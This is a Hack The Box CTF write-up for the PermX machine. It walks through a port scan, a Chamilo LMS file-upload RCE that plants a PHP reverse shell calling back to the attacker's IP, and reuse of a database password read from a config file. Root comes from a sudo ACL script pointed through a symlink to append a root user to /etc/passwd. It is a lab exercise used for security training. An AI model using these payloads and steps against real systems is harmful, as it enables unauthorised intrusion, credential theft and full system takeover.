Home

PermX – Hack The Box – @lautarovculic

, , , , ,

User.txt

Let’s see what ports are open with nmap

				
					sudo nmap -sV -p- -Pn -vv -T4 10.10.11.23

Output:

				
					PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s add permx.htb and lms.permx.htb to our /etc/hosts file

				
					sudo echo "10.10.11.23 permx.htb" | sudo tee -a /etc/hosts
sudo echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts

I found this RCE:

https://starlabs.sg/advisories/23/23-4220/

Where you can create a rce.php file with this content:

				
					<?PHP exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.XXX/1337 0>&1'"); ?>

Then, setup your nc with the port 1337 and

				
					curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
				
			
				
					curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'

Then we will get a shell as www-data

Here we can find the password for mtz user

				
					cat /var/www/chamilo/app/config/configuration.php | grep "db_password"
<o/app/config/configuration.php | grep "db_password"
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

Password: 03F6lY3uXAP2bkW8

Log in via ssh and get the flag

				
					mtz@permx:~$ cat user.txt
f17726a0**************bb828

Root.txt

If we see the acl.sh file we can run it as sudo

				
					sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

Then, we can create a symlink and a new username

				
					ln -s /etc/passwd /home/mtz/lautaro; sudo /opt/acl.sh mtz rwx /home/mtz/lautaro && ls -lah /etc/passwd && echo 'bob:$1$0x9dr7bj$zvLns.f4tmL1tAi53h6.F1:0:0:root:/root:/bin/bash' >> /etc/passwd && su bob

The password is 123

And then:

				
					Password:
root@permx:/home/mtz# cd
root@permx:~# cat root.txt
9ac35a*************66a0e87

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *